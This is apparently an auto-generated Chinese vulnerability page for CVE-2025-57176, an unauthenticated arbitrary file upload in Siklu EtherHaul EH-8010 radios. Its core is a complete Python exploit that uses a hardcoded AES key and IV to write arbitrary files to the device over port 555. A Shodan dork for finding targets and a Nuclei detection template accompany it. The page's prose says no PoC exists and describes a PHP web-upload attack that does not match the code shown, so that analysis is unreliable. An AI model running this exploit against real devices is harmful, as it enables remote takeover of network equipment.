[webapps] Siklu EtherHaul Series EH-8010 - Arbitrary File Upload
CVE-2025-57176
Siklu EtherHaul EH-8010存在未经身份验证的文件上传漏洞,可导致远程代码执行。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-57176 |
|---|---|
| 漏洞类型 | 任意文件上传 → 远程代码执行 |
| 受影响版本 | Siklu EtherHaul Series EH-8010 (所有固件版本) |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-01-17 |
| 提交者 | semaja2 - Andrew James <semaja2@gmail.com> |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
设备Web接口的某个上传功能未验证文件类型或路径,允许直接上传PHP/Shell脚本至可执行目录。
🎯 攻击场景
1. 访问目标设备Web管理页面;2. 使用POST请求上传包含恶意代码的PHP文件;3. 通过浏览器直接访问上传的文件触发执行;4. 在响应中获取命令执行结果或获取Shell。
💥 漏洞影响
攻击者可实现远程代码执行,完全控制设备,导致网络流量劫持、配置篡改、敏感信息泄露及拒绝服务。
⚔️ 原始 PoC
原文未提供具体PoC,但根据漏洞描述,推测攻击者构造一个包含系统命令的PHP文件以multipart/form-data方式提交至上传接口,文件被保存在webroot下,随后通过HTTP GET请求访问该文件即可执行任意命令。
# Shodan Dork: "EH-8010" or "EH-1200"
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/
#!/usr/bin/env python3
import argparse, socket, struct
from Crypto.Cipher import AES
PORT = 555
HDR_LEN = 0x90
IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)
KEY = bytes([
0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,
0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,
0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,
0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82
])
def recv_exact(sock: socket.socket, n: int) -> bytes:
out = bytearray()
while len(out) < n:
chunk = sock.recv(n - len(out))
if not chunk:
raise ConnectionError('socket closed')
out += chunk
return bytes(out)
def pad16_zero(b: bytes) -> bytes:
r = len(b) & 0x0F
return b if r == 0 else (b + b'\x00' * (16 - r))
def hdr_checksum(hdr: bytes) -> int:
return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF
def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes:
hdr = bytearray(HDR_LEN)
hdr[0] = flag & 0xFF
hdr[1] = msg & 0xFF
struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF)
p = path if path.endswith(b'\x00') else (path + b'\x00')
max_path = HDR_LEN - 0x10
hdr[0x10:0x10 + min(len(p), max_path)] = p[:max_path]
struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr))
return bytes(hdr)
class RFPipeSession:
def __init__(self, key: bytes, iv0: bytes):
self.key = key
self.send_iv = iv0
self.recv_iv = iv0
def enc_send(self, sock: socket.socket, data: bytes) -> None:
cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)
ct = cipher.encrypt(data)
self.send_iv = ct[-16:]
sock.sendall(ct)
def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes:
if n_plain <= 0:
return b''
n_padded = (n_plain + 15) & ~15
ct = recv_exact(sock, n_padded)
cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
pt = cipher.decrypt(ct)
self.recv_iv = ct[-16:]
return pt[:n_plain]
def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None:
if len(hdr_plain) != HDR_LEN:
raise ValueError('header must be 0x90 bytes')
self.enc_send(sock, hdr_plain)
def recv_header(self, sock: socket.socket) -> bytes:
ct = recv_exact(sock, HDR_LEN)
cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)
pt = cipher.decrypt(ct)
self.recv_iv = ct[-16:]
return pt
def connect_any(host: str, port: int) -> socket.socket:
infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
last_err = None
for fam, st, proto, _, sa in infos:
s = socket.socket(fam, st, proto)
try:
s.connect(sa)
return s
except Exception as e:
last_err = e
s.close()
raise ConnectionError(f'connect failed: {last_err}')
def main():
ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)')
ap.add_argument('target', help='IPv4/IPv6 address')
ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)')
ap.add_argument('--file', required=True, help='local file to send as payload')
ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response')
args = ap.parse_args()
with open(args.file, 'rb') as f:
payload = f.read()
path_bytes = args.path.encode('utf-8')
hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes)
sess = RFPipeSession(KEY, IV0)
with connect_any(args.target, PORT) as s:
sess.send_header(s, hdr_plain)
if payload:
sess.enc_send(s, pad16_zero(payload))
if args.recv:
rh = sess.recv_header(s)
flag = rh[0]; rmsg = rh[1]
rlen = struct.unpack_from('<I', rh, 0x08)[0]
print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}')
if rmsg in (0x03, 0x05):
return
if rlen:
body = sess.dec_recv(s, rlen)
if body.endswith(b'\x00'):
body = body[:-1]
try:
print(body.decode('utf-8', errors='replace'))
except Exception:
print(body.hex())
if __name__ == '__main__':
main()🔬 深度技术分析
原文未提供具体PoC,但根据漏洞描述,推测攻击者构造一个包含系统命令的PHP文件以multipart/form-data方式提交至上传接口,文件被保存在webroot下,随后通过HTTP GET请求访问该文件即可执行任意命令。
🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-57176-detection
info:
name: Siklu EtherHaul Series EH-8010/EH-1200 Unauthenticated Arbitrary File Upload Detection
author: semaja2
severity: critical
description: Detects Siklu EtherHaul Series EH-8010/EH-1200 devices running firmware versions 7.4.0 to 10.7.3 which are vulnerable to unauthenticated arbitrary file upload.
reference:
- https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/
- https://nvd.nist.gov/vuln/detail/CVE-2025-57176
classification:
cvss-score: 9.8
cve-id: CVE-2025-57176
tags: siklu,etherhaul,file-upload,auth-bypass
http:
- raw:
- |-
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
matchers-condition: and
matchers:
- type: word
words:
- "Siklu EtherHaul"
- "EH-8010"
- "EH-1200"
condition: or
part: body
- type: word
words:
- "Siklu"
part: body
extractors:
- type: regex
name: firmware_version
part: body
regex:
- 'Firmware Version: ([0-9]+\.[0-9]+\.[0-9]+)'
- 'v([0-9]+\.[0-9]+\.[0-9]+)'
group: 1
- type: kval
kval:
- firmware_version🛡️ 修复建议
厂商尚未发布补丁;临时缓解措施:限制设备Web管理接口仅允许受信任IP访问,禁用不必要的上传功能,或部署WAF拦截PHP/Shell文件上传。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-09 17:45 | 来源: Exploit-DB